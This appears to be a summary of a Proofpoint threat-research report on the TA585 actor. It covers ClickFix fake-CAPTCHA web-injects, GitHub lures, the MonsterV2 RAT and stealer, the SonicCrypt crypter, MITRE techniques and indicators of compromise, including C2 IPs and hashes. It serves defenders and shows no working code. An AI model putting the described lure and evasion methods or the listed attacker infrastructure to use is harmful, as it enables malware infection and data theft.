Threat Research

When the monster bytes: tracking TA585 and its arsenal

Proofpoint

Proofpoint researchers identified TA585, a cybercriminal actor that manages its own infrastructure and delivery to install third-party malware such as MonsterV2, which acts as a RAT, stealer, and loader. The report details TA585’s ClickFix web-inject delivery, GitHub notification lures, SonicCrypt crypter usage, and multiple MonsterV2 indicators including file hashes and C2 IPs. #TA585 #MonsterV2

Keypoints

  • Proofpoint named a sophisticated cybercriminal actor, TA585, that operates end-to-end: registering domains, hosting infrastructure (Cloudflare), filtering victims, and delivering malware.
  • TA585 commonly uses ClickFix web-injects on compromised legitimate websites to present fake CAPTCHA/verification that instructs users to run Win+R / PowerShell commands to fetch MonsterV2 or other payloads.
  • MonsterV2 is a commercially advertised malware (RAT/stealer/loader) observed in campaigns since Feb 2025 and used by multiple cybercriminal customers, not authored by TA585.
  • MonsterV2 capabilities include infostealing (browsers, wallets, tokens), HVNC, webcam recording, clipboard clippers, remote command execution, and downloading additional payloads; it intentionally avoids infecting CIS countries.
  • TA585 also uses social-engineering via GitHub notification lures and shortened URLs to redirect targets to actor-controlled sites that perform the same ClickFix-style checks and delivery.
  • MonsterV2 configurations and communications use ChaCha20 encryption and Zlib compression; initial C2 check-in includes detailed system metadata and supports large, compressed C2 responses with many commands.
  • SonicCrypt, a commercial crypter observed packing MonsterV2, performs anti-analysis checks, adds Defender exclusions or autostart in some builds, and drops decrypted payloads executed via the Task Scheduler.

MITRE Techniques

  • [T1566] Phishing – TA585 sent emails impersonating US government agencies (IRS, SBA) and used GitHub notification lures to deliver URLs leading to malicious ClickFix pages (“…IRS themed lures… Messages contained URLs linking to a PDF which would open in the browser. The PDF linked to a webpage that was using the ClickFix technique…”).
  • [T1204] User Execution – ClickFix social engineering coerced users to run PowerShell/Win+R commands manually to download and execute MonsterV2 (“…which lures visitors to manually run a malicious command in the Windows Run-box or PowerShell terminal…”).
  • [T1189] Drive-by Compromise – TA585 compromised legitimate websites with JavaScript injections to serve malicious overlays and filter victims before delivering payloads (“…websites have been compromised with a malicious JavaScript injection. This injection causes the website to load a malicious script…”).
  • [T1105] Ingress Tool Transfer – PowerShell commands downloaded and executed secondary scripts and ultimately MonsterV2 on victim hosts (“…copied and pasted the PowerShell script as instructed, it executed a second PowerShell script ultimately leading to MonsterV2.”).
  • [T1059] Command and Scripting Interpreter – Malware and delivery used PowerShell commands and arbitrary command line execution to fetch and run payloads (“…initiated a PowerShell command that downloads and executes malware…”).
  • [T1041] Exfiltration Over C2 Channel – MonsterV2 collects system and user data, then sends base64-encoded, ChaCha20-encrypted, and Zlib-compressed data to C2 servers (“…sent the following information… stored in stack memory as a structure and then later base-64 encoded and sent to the C2 server.”).
  • [T1071] Application Layer Protocol – MonsterV2 uses raw TCP sockets with custom encryption (ChaCha20 and key exchange) for communication with C2 (“…a raw TCP connection is used with a small add-on on top in the form of an exchange of encryption keys with two-way authentication…”).
  • [T1106] Native API – MonsterV2 resolves and calls Windows API functions dynamically after decrypting API name strings (“…decrypts and resolves several Windows API functions it requires. Each library and function name string is decrypted…”).
  • [T1543] Create or Modify System Process – SonicCrypt and MonsterV2 use the Task Scheduler to execute dropped payloads and achieve persistence (“…the payload is executed using the task scheduler.”).
  • [T1497] Virtualization/Sandbox Evasion – SonicCrypt and MonsterV2 perform environment checks and optional anti-sandbox / anti-debugging behaviors before decryption/execution (“…Runs initial evasion and environment checks… Checking amount of RAM… checks the infected systems’ BIOS manufacturer…”).
  • [T1562] Impair Defenses – SonicCrypt can add the dropped executable to Windows Defender exclusions and support UAC bypass, reducing detection and prevention (“…Support for adding your file to Windows Defender exceptions… the crypt supports the ability to bypass UAC…”).

Indicators of Compromise

  • [File Hash ] MonsterV2 sample hashes – ccac0311b3e3674282d87db9fb8a151c7b11405662159a46dda71039f2200a67, 666944b19c707afaa05453909d395f979a267b28ff43d90d143cd36f6b74b53e (and 11 more hashes listed in the report).
  • [IP Address ] MonsterV2 C2 servers – 139.180.160[.]173, 155.138.150[.]12 (additional C2 IPs include 83.217.208[.]77, 91.200.14[.]69, etc.).
  • [Domain ] TA585 infrastructure and injects – intlspring[.]com used in web-inject campaigns; actor-controlled redirect domains used with ClickFix overlays.
  • [Port ] C2 communication – common MonsterV2 C2 port 7712 across multiple samples and IPs.
  • [File Name ] SonicCrypt dropper naming convention – typical dropped payload names such as WinHealth.exe, WindowsSecurity.exe used by the crypter when writing decrypted payload to disk.

Read more: https://www.proofpoint.com/us/blog/threat-insight/when-monster-bytes-tracking-ta585-and-its-arsenal